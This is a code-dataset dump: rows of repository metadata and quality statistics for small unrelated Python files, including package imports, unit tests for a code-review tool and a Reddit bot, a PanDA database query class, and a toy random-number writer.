hexsha
string
size
int64
ext
string
lang
string
max_stars_repo_path
string
max_stars_repo_name
string
max_stars_repo_head_hexsha
string
max_stars_repo_licenses
list
max_stars_count
int64
max_stars_repo_stars_event_min_datetime
string
max_stars_repo_stars_event_max_datetime
string
max_issues_repo_path
string
max_issues_repo_name
string
max_issues_repo_head_hexsha
string
max_issues_repo_licenses
list
max_issues_count
int64
max_issues_repo_issues_event_min_datetime
string
max_issues_repo_issues_event_max_datetime
string
max_forks_repo_path
string
max_forks_repo_name
string
max_forks_repo_head_hexsha
string
max_forks_repo_licenses
list
max_forks_count
int64
max_forks_repo_forks_event_min_datetime
string
max_forks_repo_forks_event_max_datetime
string
content
string
avg_line_length
float64
max_line_length
int64
alphanum_fraction
float64
qsc_code_num_words_quality_signal
int64
qsc_code_num_chars_quality_signal
float64
qsc_code_mean_word_length_quality_signal
float64
qsc_code_frac_words_unique_quality_signal
float64
qsc_code_frac_chars_top_2grams_quality_signal
float64
qsc_code_frac_chars_top_3grams_quality_signal
float64
qsc_code_frac_chars_top_4grams_quality_signal
float64
qsc_code_frac_chars_dupe_5grams_quality_signal
float64
qsc_code_frac_chars_dupe_6grams_quality_signal
float64
qsc_code_frac_chars_dupe_7grams_quality_signal
float64
qsc_code_frac_chars_dupe_8grams_quality_signal
float64
qsc_code_frac_chars_dupe_9grams_quality_signal
float64
qsc_code_frac_chars_dupe_10grams_quality_signal
float64
qsc_code_frac_chars_replacement_symbols_quality_signal
float64
qsc_code_frac_chars_digital_quality_signal
float64
qsc_code_frac_chars_whitespace_quality_signal
float64
qsc_code_size_file_byte_quality_signal
float64
qsc_code_num_lines_quality_signal
float64
qsc_code_num_chars_line_max_quality_signal
float64
qsc_code_num_chars_line_mean_quality_signal
float64
qsc_code_frac_chars_alphabet_quality_signal
float64
qsc_code_frac_chars_comments_quality_signal
float64
qsc_code_cate_xml_start_quality_signal
float64
qsc_code_frac_lines_dupe_lines_quality_signal
float64
qsc_code_cate_autogen_quality_signal
float64
qsc_code_frac_lines_long_string_quality_signal
float64
qsc_code_frac_chars_string_length_quality_signal
float64
qsc_code_frac_chars_long_word_length_quality_signal
float64
qsc_code_frac_lines_string_concat_quality_signal
float64
qsc_code_cate_encoded_data_quality_signal
float64
qsc_code_frac_chars_hex_words_quality_signal
float64
qsc_code_frac_lines_prompt_comments_quality_signal
float64
qsc_code_frac_lines_assert_quality_signal
float64
qsc_codepython_cate_ast_quality_signal
float64
qsc_codepython_frac_lines_func_ratio_quality_signal
float64
qsc_codepython_cate_var_zero_quality_signal
bool
qsc_codepython_frac_lines_pass_quality_signal
float64
qsc_codepython_frac_lines_import_quality_signal
float64
qsc_codepython_frac_lines_simplefunc_quality_signal
float64
qsc_codepython_score_lines_no_logic_quality_signal
float64
qsc_codepython_frac_lines_print_quality_signal
float64
qsc_code_num_words
int64
qsc_code_num_chars
int64
qsc_code_mean_word_length
int64
qsc_code_frac_words_unique
null
qsc_code_frac_chars_top_2grams
int64
qsc_code_frac_chars_top_3grams
int64
qsc_code_frac_chars_top_4grams
int64
qsc_code_frac_chars_dupe_5grams
int64
qsc_code_frac_chars_dupe_6grams
int64
qsc_code_frac_chars_dupe_7grams
int64
qsc_code_frac_chars_dupe_8grams
int64
qsc_code_frac_chars_dupe_9grams
int64
qsc_code_frac_chars_dupe_10grams
int64
qsc_code_frac_chars_replacement_symbols
int64
qsc_code_frac_chars_digital
int64
qsc_code_frac_chars_whitespace
int64
qsc_code_size_file_byte
int64
qsc_code_num_lines
int64
qsc_code_num_chars_line_max
int64
qsc_code_num_chars_line_mean
int64
qsc_code_frac_chars_alphabet
int64
qsc_code_frac_chars_comments
int64
qsc_code_cate_xml_start
int64
qsc_code_frac_lines_dupe_lines
int64
qsc_code_cate_autogen
int64
qsc_code_frac_lines_long_string
int64
qsc_code_frac_chars_string_length
int64
qsc_code_frac_chars_long_word_length
int64
qsc_code_frac_lines_string_concat
null
qsc_code_cate_encoded_data
int64
qsc_code_frac_chars_hex_words
int64
qsc_code_frac_lines_prompt_comments
int64
qsc_code_frac_lines_assert
int64
qsc_codepython_cate_ast
int64
qsc_codepython_frac_lines_func_ratio
int64
qsc_codepython_cate_var_zero
int64
qsc_codepython_frac_lines_pass
int64
qsc_codepython_frac_lines_import
int64
qsc_codepython_frac_lines_simplefunc
int64
qsc_codepython_score_lines_no_logic
int64
qsc_codepython_frac_lines_print
int64
effective
string
hits
int64
df66ddefb0262a60a3c54dd4d3a557c00d7aec79
43
py
Python
mechanics/swig/mechanics/collision/__init__.py
ljktest/siconos
85b60e62beca46e6bf06bfbd65670089e86607c7
[ "Apache-2.0" ]
137
2015-06-16T15:55:28.000Z
2022-03-26T06:01:59.000Z
mechanics/swig/mechanics/collision/__init__.py
ljktest/siconos
85b60e62beca46e6bf06bfbd65670089e86607c7
[ "Apache-2.0" ]
381
2015-09-22T15:31:08.000Z
2022-02-14T09:05:23.000Z
mechanics/swig/mechanics/collision/__init__.py
ljktest/siconos
85b60e62beca46e6bf06bfbd65670089e86607c7
[ "Apache-2.0" ]
30
2015-08-06T22:57:51.000Z
2022-03-02T20:30:20.000Z
from .base import * from .native import *
10.75
21
0.697674
6
43
5
0.666667
0
0
0
0
0
0
0
0
0
0
0
0.209302
43
3
22
14.333333
0.882353
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
10dcbd44dbdd721c9efcef095faf26ea8b76efc2
354
py
Python
Numbers Generator.py
supervrijdag/Python-Random-Number-Generator
369e1ddc5d46b2b56ee3ed7c525614a6d80e85c2
[ "MIT" ]
null
null
null
Numbers Generator.py
supervrijdag/Python-Random-Number-Generator
369e1ddc5d46b2b56ee3ed7c525614a6d80e85c2
[ "MIT" ]
null
null
null
Numbers Generator.py
supervrijdag/Python-Random-Number-Generator
369e1ddc5d46b2b56ee3ed7c525614a6d80e85c2
[ "MIT" ]
null
null
null
import random f = open('Numbes.txt','w') while True: number = str(random.randint(100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000,999999999999999999999999999999999999999999999999999999999990000000000000000000000000000000000000000000000000000000000)) f.write(number)
39.333333
270
0.858757
18
354
16.888889
0.833333
0
0
0
0
0
0
0
0
0
0
0.722222
0.084746
354
8
271
44.25
0.216049
0
0
0
0
0
0.031884
0
0
1
0
0
0
1
0
false
0
0.2
0
0.2
0
1
0
1
null
0
0
0
0
0
0
0
0
0
0
1
0
0
1
0
0
1
0
0
0
0
0
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
6
804bdc206935b217a7d6507dcc849b56abe5bb0c
32
py
Python
P25035-Changsha-Zhouzhenxing/week01/test.py
tonylhb/python-25
321793d5abe92b71fe5a89f0d5022cced9277406
[ "Apache-2.0" ]
1
2019-09-11T23:24:58.000Z
2019-09-11T23:24:58.000Z
P25035-Changsha-Zhouzhenxing/week01/test.py
tonylhb/python-25
321793d5abe92b71fe5a89f0d5022cced9277406
[ "Apache-2.0" ]
null
null
null
P25035-Changsha-Zhouzhenxing/week01/test.py
tonylhb/python-25
321793d5abe92b71fe5a89f0d5022cced9277406
[ "Apache-2.0" ]
5
2019-09-11T06:33:34.000Z
2020-02-17T12:52:31.000Z
print('Hello This is test info')
32
32
0.75
6
32
4
1
0
0
0
0
0
0
0
0
0
0
0
0.125
32
1
32
32
0.857143
0
0
0
0
0
0.69697
0
0
0
0
0
0
1
0
true
0
0
0
0
1
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
1
0
null
0
0
0
0
0
0
1
0
0
0
0
1
0
6
d510bf0c2d80c481b7973ca6b54f6b0c75a28588
13,852
py
Python
testing/tests/001-main/003-self/200-json/008-batches.py
piwaniuk/critic
28ed20bb8032d7cc5aa23de98da51e619fd84164
[ "Apache-2.0" ]
216
2015-01-05T12:48:10.000Z
2022-03-08T00:12:23.000Z
testing/tests/001-main/003-self/200-json/008-batches.py
piwaniuk/critic
28ed20bb8032d7cc5aa23de98da51e619fd84164
[ "Apache-2.0" ]
55
2015-02-28T12:10:26.000Z
2020-11-18T17:45:16.000Z
testing/tests/001-main/003-self/200-json/008-batches.py
piwaniuk/critic
28ed20bb8032d7cc5aa23de98da51e619fd84164
[ "Apache-2.0" ]
34
2015-05-02T15:15:10.000Z
2020-06-15T19:20:37.000Z
# @dependency 001-main/002-createrepository.py with repository.workcopy() as work: review = Review(work, "alice", "200-json/008-batches") review.addFile(first="200-json/008-batches/first.txt", second="200-json/008-batches/second.txt", third="200-json/008-batches/third.txt") review.commit("Reference commit", reference=True, first=["First", "=====", "Initial line"], second=["Second", "======", "Initial line"], third=["Third", "=====", "Initial line"]) review.commit("First commit", first=["First", "=====", "Initial line", "Added line"]) review.commit("Second commit", second=["Second", "======", "Initial line", "Added line"]) review.commit("Third commit", third=["Third", "=====", "Initial line", "Added line"]) review.addFilter("bob", "reviewer", "200-json/008-batches/") review.addFilter("dave", "reviewer", "200-json/008-batches/") review.submit() changesets = { "first": fetch_changeset({ "from": review.sha1s[0], "to": review.sha1s[1], }), "second": fetch_changeset({ "from": review.sha1s[1], "to": review.sha1s[2], }), "third": fetch_changeset({ "from": review.sha1s[2], "to": review.sha1s[3], }), "all": fetch_changeset({ "from": review.sha1s[0], "to": review.sha1s[3], }), } issues = { "alice": [], "bob": [], "dave": [] } changes = {} def fetch_changes(key): changes[key] = frontend.json( ("reviews/%d/changesets/%d/reviewablefilechanges" % (review.id, changesets[key]["id"])), expect={ "reviewablefilechanges": [{ "id": int, "review": review.id, "changeset": changesets[key]["id"], "file": review.getFileId(key), "deleted_lines": int, "inserted_lines": int, "is_reviewed": False, "reviewed_by": None, "assigned_reviewers": [instance.userid("bob"), instance.userid("dave")], "draft_changes": None, }], })["reviewablefilechanges"] fetch_changes("first") fetch_changes("second") fetch_changes("third") with frontend.signin("alice"): frontend.json( "reviews/%d/batches" % review.id, params={ "unpublished": "yes", }, expect=batch_json(review.id, "alice", "draft")) issues["alice"].append( frontend.json( "reviews/%d/issues" % review.id, post={ "text": "Alice's issue #1", "location": { "type": "file-version", "changeset": changesets["first"]["id"], "side": "new", "file": review.getFilename("first"), "first_line": 1, "last_line": 4, } })["id"]) frontend.json( "reviews/%d/batches" % review.id, params={ "unpublished": "yes", }, expect=batch_json(review.id, "alice", "draft", created_comments=[issues["alice"][0]])) issues["alice"].append( frontend.json( "reviews/%d/issues" % review.id, post={ "text": "Alice's issue #2", "location": { "type": "file-version", "changeset": changesets["second"]["id"], "side": "new", "file": review.getFilename("second"), "first_line": 1, "last_line": 2, } })["id"]) frontend.json( "reviews/%d/batches" % review.id, params={ "unpublished": "yes", }, expect=batch_json(review.id, "alice", "draft", created_comments=[issues["alice"][0], issues["alice"][1]])) frontend.json( "reviews/%d/batches" % review.id, post={}, expect=batch_json(review.id, "alice", "published", created_comments=[issues["alice"][0], issues["alice"][1]])) frontend.json( "reviews/%d/batches" % review.id, params={ "unpublished": "yes", }, expect=batch_json(review.id, "alice", "draft")) with frontend.signin("bob"): frontend.json( "reviews/%d/batches" % review.id, params={ "unpublished": "yes", }, expect=batch_json(review.id, "bob", "draft")) issues["bob"].append( frontend.json( "reviews/%d/issues" % review.id, post={ "text": "Bob's issue #1", "location": { "type": "file-version", "changeset": changesets["second"]["id"], "side": "new", "file": review.getFilename("second"), "first_line": 3, "last_line": 4, } })["id"]) frontend.json( "comments/%d" % issues["alice"][0], put={ "draft_changes": { "new_state": "resolved", }, }, expect={ "id": issues["alice"][0], "state": "open", "draft_changes": draft_changes_json( "bob", new_state="resolved"), "*": "*", }) frontend.json( ("reviews/%d/changesets/%d/reviewablefilechanges" % (review.id, changesets["second"]["id"])), put={ "draft_changes": { "new_is_reviewed": True, } }, expect={ "reviewablefilechanges": [{ "id": int, "review": review.id, "changeset": changesets["second"]["id"], "file": review.getFileId("second"), "deleted_lines": int, "inserted_lines": int, "is_reviewed": False, "reviewed_by": None, "assigned_reviewers": [instance.userid("bob"), instance.userid("dave")], "draft_changes": { "author": instance.userid("bob"), "new_is_reviewed": True, "new_reviewed_by": instance.userid("bob"), }, }], }) frontend.json( "reviews/%d/batches" % review.id, params={ "unpublished": "yes", }, expect=batch_json(review.id, "bob", "draft", created_comments=[issues["bob"][0]], resolved_issues=[issues["alice"][0]], reviewed_changes=[changes["second"][0]["id"]])) with frontend.signin("dave"): frontend.json( "reviews/%d/batches" % review.id, params={ "unpublished": "yes", }, expect=batch_json(review.id, "dave", "draft")) issues["dave"].append( frontend.json( "reviews/%d/issues" % review.id, post={ "text": "Dave's issue #1", "location": { "type": "file-version", "changeset": changesets["all"]["id"], "side": "new", "file": review.getFilename("third"), "first_line": 1, "last_line": 4, } })["id"]) frontend.json( "comments/%d" % issues["alice"][0], put={ "draft_changes": { "new_state": "resolved", }, }, expect={ "id": issues["alice"][0], "state": "open", "draft_changes": draft_changes_json( "dave", new_state="resolved"), "*": "*", }) frontend.json( "comments/%d" % issues["alice"][1], put={ "draft_changes": { "new_state": "resolved", }, }, expect={ "id": issues["alice"][1], "state": "open", "draft_changes": draft_changes_json( "dave", new_state="resolved"), "*": "*", }) frontend.json( "reviewablefilechanges/%d,%d" % (changes["second"][0]["id"], changes["third"][0]["id"]), put={ "draft_changes": { "new_is_reviewed": True, } }, expect={ "reviewablefilechanges": [{ "id": int, "review": review.id, "changeset": changesets["second"]["id"], "file": review.getFileId("second"), "deleted_lines": int, "inserted_lines": int, "is_reviewed": False, "reviewed_by": None, "assigned_reviewers": [instance.userid("bob"), instance.userid("dave")], "draft_changes": { "author": instance.userid("dave"), "new_is_reviewed": True, "new_reviewed_by": instance.userid("dave"), }, }, { "id": int, "review": review.id, "changeset": changesets["third"]["id"], "file": review.getFileId("third"), "deleted_lines": int, "inserted_lines": int, "is_reviewed": False, "reviewed_by": None, "assigned_reviewers": [instance.userid("bob"), instance.userid("dave")], "draft_changes": { "author": instance.userid("dave"), "new_is_reviewed": True, "new_reviewed_by": instance.userid("dave"), }, }], }) frontend.json( "reviews/%d/batches" % review.id, params={ "unpublished": "yes", }, expect=batch_json(review.id, "dave", "draft", created_comments=[issues["dave"][0]], resolved_issues=[issues["alice"][0], issues["alice"][1]], reviewed_changes=[changes["second"][0]["id"], changes["third"][0]["id"]])) with frontend.signin("bob"): frontend.json( "reviews/%d/batches" % review.id, params={ "unpublished": "yes", }, expect=batch_json(review.id, "bob", "draft", created_comments=[issues["bob"][0]], resolved_issues=[issues["alice"][0]], reviewed_changes=[changes["second"][0]["id"]])) frontend.json( "reviews/%d/batches" % review.id, post={ "comment": "This looks good!", }, expect=batch_json(review.id, "bob", "published", comment=int, created_comments=[issues["bob"][0]], resolved_issues=[issues["alice"][0]], reviewed_changes=[changes["second"][0]["id"]])) frontend.json( "reviews/%d/batches" % review.id, params={ "unpublished": "yes", }, expect=batch_json(review.id, "bob", "draft")) with frontend.signin("dave"): frontend.json( "reviews/%d/batches" % review.id, params={ "unpublished": "yes", }, expect=batch_json(review.id, "dave", "draft", created_comments=[issues["dave"][0]], resolved_issues=[issues["alice"][1]], reviewed_changes=[changes["third"][0]["id"]])) # eof
36.072917
77
0.380667
1,001
13,852
5.160839
0.100899
0.055749
0.06988
0.073558
0.84127
0.815718
0.755517
0.748161
0.734998
0.672474
0
0.013689
0.472639
13,852
383
78
36.167102
0.693498
0.003465
0
0.698864
0
0
0.20071
0.024346
0
0
0
0
0
1
0.002841
false
0
0
0
0.002841
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
1d8844409374c25ed07d2fd0a2fbef5e5063ca28
40
py
Python
deepspeed/ops/adam/__init__.py
bratao/DeepSpeed
c50d8955e942e5e26cf81835d59ec3f20ef8540d
[ "MIT" ]
1
2020-09-25T13:54:15.000Z
2020-09-25T13:54:15.000Z
deepspeed/ops/adam/__init__.py
bratao/DeepSpeed
c50d8955e942e5e26cf81835d59ec3f20ef8540d
[ "MIT" ]
null
null
null
deepspeed/ops/adam/__init__.py
bratao/DeepSpeed
c50d8955e942e5e26cf81835d59ec3f20ef8540d
[ "MIT" ]
1
2020-09-13T08:06:51.000Z
2020-09-13T08:06:51.000Z
from .cpu_adam import DeepSpeedCPUAdam
20
39
0.85
5
40
6.6
1
0
0
0
0
0
0
0
0
0
0
0
0.125
40
1
40
40
0.942857
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
d53eaa9827ac3d5897b7fdf373ebf9a80e6e4416
1,816
py
Python
tests/data/test_bo_unblacklist_user.py
c17r/TagTrain
5aa1ca36439cc5e81d0c691f905a4bb879b78399
[ "MIT" ]
null
null
null
tests/data/test_bo_unblacklist_user.py
c17r/TagTrain
5aa1ca36439cc5e81d0c691f905a4bb879b78399
[ "MIT" ]
7
2020-03-24T17:54:31.000Z
2021-09-21T12:34:34.000Z
tests/data/test_bo_unblacklist_user.py
c17r/TagTrain
5aa1ca36439cc5e81d0c691f905a4bb879b78399
[ "MIT" ]
null
null
null
import pytest from . import db from .db import database from tagtrain import data def test_unknown_user(database): with pytest.raises(data.Group.DoesNotExist): data.by_owner.unblacklist_user('non-existent', 'doesnt-matter', db.GROUP_NAME) def test_unknown_group(database): with pytest.raises(data.Group.DoesNotExist): data.by_owner.unblacklist_user(db.OWNER_NAME, 'doesnt-matter', 'non-existent') def test_unknown_blanket_blacklist(database): with pytest.raises(data.Blacklist.DoesNotExist): data.by_owner.unblacklist_user(db.OWNER_NAME, 'non-existent') def test_unknown_group_blacklist(database): with pytest.raises(data.Blacklist.DoesNotExist): data.by_owner.unblacklist_user(db.OWNER_NAME, 'non-existent', db.GROUP_NAME) def test_good_blanket(database): OWNER_NAME = 'user2' MEMBER_NAME = 'blockee' bls = list(data.by_owner.find_blacklists(OWNER_NAME, MEMBER_NAME)) assert len(bls) == 1 bl = data.by_owner.unblacklist_user(OWNER_NAME, MEMBER_NAME) assert bl.owner_reddit_name == OWNER_NAME assert bl.blocked_reddit_name == MEMBER_NAME assert bl.group is None bls = list(data.by_owner.find_blacklists(OWNER_NAME, MEMBER_NAME)) assert len(bls) == 0 def test_good_group(database): OWNER_NAME = db.OWNER_NAME GROUP_NAME = db.GROUP_NAME MEMBER_NAME = 'blockee' bls = list(data.by_owner.find_blacklists(OWNER_NAME, MEMBER_NAME)) assert len(bls) == 2 bl = data.by_owner.unblacklist_user(OWNER_NAME, MEMBER_NAME, GROUP_NAME) assert bl.owner_reddit_name == OWNER_NAME assert bl.blocked_reddit_name == MEMBER_NAME assert bl.group is not None assert bl.group.name == db.GROUP_NAME bls = list(data.by_owner.find_blacklists(OWNER_NAME, MEMBER_NAME)) assert len(bls) == 1
30.266667
86
0.742291
263
1,816
4.851711
0.1673
0.098746
0.086207
0.109718
0.80721
0.717085
0.717085
0.717085
0.717085
0.708464
0
0.003266
0.156938
1,816
59
87
30.779661
0.830176
0
0
0.4
0
0
0.051211
0
0
0
0
0
0.275
1
0.15
false
0
0.1
0
0.25
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
d598314ea9d76bb701fcce1812203ee46b871a0b
3,390
py
Python
pq_ce_monitoring/pq_pandadb.py
PanDAWMS/harvester_monitoring
85d4ce57eab97ad20f146ad1068325ce7a596667
[ "Apache-2.0" ]
null
null
null
pq_ce_monitoring/pq_pandadb.py
PanDAWMS/harvester_monitoring
85d4ce57eab97ad20f146ad1068325ce7a596667
[ "Apache-2.0" ]
null
null
null
pq_ce_monitoring/pq_pandadb.py
PanDAWMS/harvester_monitoring
85d4ce57eab97ad20f146ad1068325ce7a596667
[ "Apache-2.0" ]
1
2019-02-20T17:36:48.000Z
2019-02-20T17:36:48.000Z
import json from logger import ServiceLogger from baseclasses.oracledbbaseclass import OracleDbBaseClass _logger = ServiceLogger("pq_pandadb", __file__).logger class PandaDBPQ(OracleDbBaseClass): def __init__(self, path): super().__init__(path) def get_running_workers_jobs(self): try: connection = self.connection computingsite_stat = {} query = """ SELECT computingsite, count(status) as nworkers, count(jobstatus) as njobs FROM (SELECT ww.computingsite as computingsite, ww.status as status, ww.lastupdate as wlastupdate, ww.starttime as wstarttime, jj.pandaid, jj.LASTUPDATE as pidlastupdate, ja.jobstatus, ja.computingsite as jobcomputingsite FROM ATLAS_PANDA.harvester_workers ww LEFT OUTER JOIN atlas_panda.harvester_rel_jobs_workers jj ON ww.harvesterid = jj.harvesterid and ww.workerid = jj.workerid LEFT OUTER JOIN atlas_panda.jobsactive4 ja ON jj.pandaid = ja.pandaid ) WHERE status = 'running' and wlastupdate >= CAST (sys_extract_utc(SYSTIMESTAMP) - interval '10' minute as DATE) GROUP BY computingsite """ results = self.__read_query(query, connection) for result in results: computingsite_stat[result['computingsite']] = {'nworkers':result['nworkers'], 'njobs':result['njobs']} except: pass return computingsite_stat def get_running_workers_completed_jobs(self): try: connection = self.connection computingsite_stat = {} query = """ SELECT computingsite, count(status) as nworkers, count(jobstatus) as njobs FROM (SELECT ww.computingsite as computingsite, ww.status as status, ww.lastupdate as wlastupdate, ww.starttime as wstarttime, jj.pandaid, jj.LASTUPDATE as pidlastupdate, ja.jobstatus, ja.computingsite as jobcomputingsite FROM ATLAS_PANDA.harvester_workers ww LEFT OUTER JOIN atlas_panda.harvester_rel_jobs_workers jj ON ww.harvesterid = jj.harvesterid and ww.workerid = jj.workerid LEFT OUTER JOIN atlas_panda.jobsarchived4 ja ON jj.pandaid = ja.pandaid) WHERE status = 'running' and wlastupdate >= CAST (sys_extract_utc(SYSTIMESTAMP) - interval '10' minute as DATE) GROUP BY computingsite """ results = self.__read_query(query, connection) for result in results: computingsite_stat[result['computingsite']] = {'nworkers':result['nworkers'], 'njobs':result['njobs']} except: pass return computingsite_stat # private method def __read_query(self, query, connection): cursor = connection.cursor() try: cursor.execute(query) return self.__rows_to_dict_list(cursor) finally: if cursor is not None: cursor.close() # private method def __rows_to_dict_list(self, cursor): columns = [str(i[0]).lower() for i in cursor.description] return [dict(zip(columns, row)) for row in cursor]
36.451613
134
0.613274
354
3,390
5.69209
0.279661
0.05062
0.037717
0.035732
0.735484
0.735484
0.735484
0.735484
0.735484
0.735484
0
0.003002
0.312094
3,390
92
135
36.847826
0.861063
0.008555
0
0.716216
0
0.054054
0.549434
0.072067
0
0
0
0
0
1
0.067568
false
0.027027
0.040541
0
0.175676
0
0
0
0
null
0
0
0
0
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
6340a6f2358fdb957ebfd45cb5a7ac10c3782961
93
py
Python
spec/bin/argv.py
Schweinepriester/oil
8b0e5c58a825223341896064d63a95c8b57a9c05
[ "Apache-2.0" ]
2,209
2016-11-20T10:32:58.000Z
2022-03-31T20:51:27.000Z
spec/bin/argv.py
Schweinepriester/oil
8b0e5c58a825223341896064d63a95c8b57a9c05
[ "Apache-2.0" ]
1,074
2016-12-07T05:02:48.000Z
2022-03-22T02:09:11.000Z
spec/bin/argv.py
Schweinepriester/oil
8b0e5c58a825223341896064d63a95c8b57a9c05
[ "Apache-2.0" ]
147
2016-12-11T04:13:28.000Z
2022-03-27T14:50:00.000Z
#!/usr/bin/env python2 from __future__ import print_function import sys print(sys.argv[1:])
15.5
37
0.774194
15
93
4.466667
0.8
0
0
0
0
0
0
0
0
0
0
0.024096
0.107527
93
5
38
18.6
0.783133
0.225806
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
0.666667
0
0.666667
0.666667
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
1
0
6
634d414f3ba9ef3b9d6ff170297e0f5c715feae7
467
py
Python
edgelm/examples/MMPT/mmpt/tasks/__init__.py
guotao0628/DeepNet
1ae74d8b44d715bf67c7d64a8efafff4b7c7937a
[ "MIT" ]
1
2021-11-07T00:30:05.000Z
2021-11-07T00:30:05.000Z
edgelm/examples/MMPT/mmpt/tasks/__init__.py
guotao0628/DeepNet
1ae74d8b44d715bf67c7d64a8efafff4b7c7937a
[ "MIT" ]
null
null
null
edgelm/examples/MMPT/mmpt/tasks/__init__.py
guotao0628/DeepNet
1ae74d8b44d715bf67c7d64a8efafff4b7c7937a
[ "MIT" ]
null
null
null
# Copyright (c) Facebook, Inc. and its affiliates. # # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. from .task import * from .vlmtask import * from .retritask import * try: from .fairseqmmtask import * except ImportError: pass try: from .milncetask import * except ImportError: pass try: from .expretritask import * except ImportError: pass
20.304348
66
0.687366
59
467
5.440678
0.59322
0.065421
0.214953
0.252336
0.211838
0.211838
0
0
0
0
0
0
0.252677
467
22
67
21.227273
0.919771
0.359743
0
0.6
0
0
0
0
0
0
0
0
0
1
0
true
0.2
0.6
0
0.6
0
0
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
1
1
0
1
0
0
6
6368c6ff6119a625f388c77f74148a947cac98b0
18
py
Python
emacs/emacs.d/python-mode/test/UnicodeEncodeError-python2-lp-550661-test.py
KitKod/dotfiles
92d8081280c7b6ebe7d91a00efb5dcdcc882b271
[ "BSD-3-Clause" ]
87
2015-01-03T13:57:31.000Z
2022-01-18T14:56:23.000Z
emacs/emacs.d/python-mode/test/UnicodeEncodeError-python2-lp-550661-test.py
KitKod/dotfiles
92d8081280c7b6ebe7d91a00efb5dcdcc882b271
[ "BSD-3-Clause" ]
1
2015-09-13T15:45:54.000Z
2015-09-13T15:45:54.000Z
emacs/emacs.d/python-mode/test/UnicodeEncodeError-python2-lp-550661-test.py
KitKod/dotfiles
92d8081280c7b6ebe7d91a00efb5dcdcc882b271
[ "BSD-3-Clause" ]
124
2015-01-15T22:05:39.000Z
2022-03-20T18:35:57.000Z
print(u'\xA9')
3.6
14
0.5
3
18
3
1
0
0
0
0
0
0
0
0
0
0
0.071429
0.222222
18
4
15
4.5
0.571429
0
0
0
0
0
0.266667
0
0
0
0
0
0
1
0
true
0
0
0
0
1
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
1
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
0
0
0
1
0
6
892f1458e31c73522fc2b21e5aa86b619e94a5a0
147
py
Python
conf/script/src/build_system/compiler/__init__.py
benoit-dubreuil/template-repo-cpp-full-ecosystem
f506dd5e2a61cdd311b6a6a4be4abc59567b4b20
[ "MIT" ]
null
null
null
conf/script/src/build_system/compiler/__init__.py
benoit-dubreuil/template-repo-cpp-full-ecosystem
f506dd5e2a61cdd311b6a6a4be4abc59567b4b20
[ "MIT" ]
113
2021-02-15T19:22:36.000Z
2021-05-07T15:17:42.000Z
conf/script/src/build_system/compiler/__init__.py
benoit-dubreuil/template-repo-cpp-full-ecosystem
f506dd5e2a61cdd311b6a6a4be4abc59567b4b20
[ "MIT" ]
null
null
null
from .build_option import * from .core import * from .installed_instance import * from .reqs import * from .supported_installed_instances import *
24.5
44
0.795918
19
147
5.947368
0.526316
0.353982
0
0
0
0
0
0
0
0
0
0
0.136054
147
5
45
29.4
0.889764
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
897d3eb7061aee4346e0741682d29323f39bf029
64
py
Python
ctc-no-dependencies/loaders/__init__.py
martin-fabbri/ctc-tensorflow
4e45f8c62223d4287896d29099c2c15be5e70bd9
[ "Apache-2.0" ]
null
null
null
ctc-no-dependencies/loaders/__init__.py
martin-fabbri/ctc-tensorflow
4e45f8c62223d4287896d29099c2c15be5e70bd9
[ "Apache-2.0" ]
null
null
null
ctc-no-dependencies/loaders/__init__.py
martin-fabbri/ctc-tensorflow
4e45f8c62223d4287896d29099c2c15be5e70bd9
[ "Apache-2.0" ]
null
null
null
from .audio_loader import * from .data_loader import DataLoader
21.333333
35
0.828125
9
64
5.666667
0.666667
0.470588
0
0
0
0
0
0
0
0
0
0
0.125
64
2
36
32
0.910714
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
89814eb0b15b01d17501db843cacd5a5770379fd
23,563
py
Python
gs_quant/timeseries/measures_rates.py
alexanu/gs-quant
fbb8d88d570aee545ed3a8601d9052c281ecca19
[ "Apache-2.0" ]
1
2020-05-18T02:09:39.000Z
2020-05-18T02:09:39.000Z
gs_quant/timeseries/measures_rates.py
atefar2/gs-quant
d31ae3204d5421861897bac49383bc213d5497a2
[ "Apache-2.0" ]
null
null
null
gs_quant/timeseries/measures_rates.py
atefar2/gs-quant
d31ae3204d5421861897bac49383bc213d5497a2
[ "Apache-2.0" ]
null
null
null
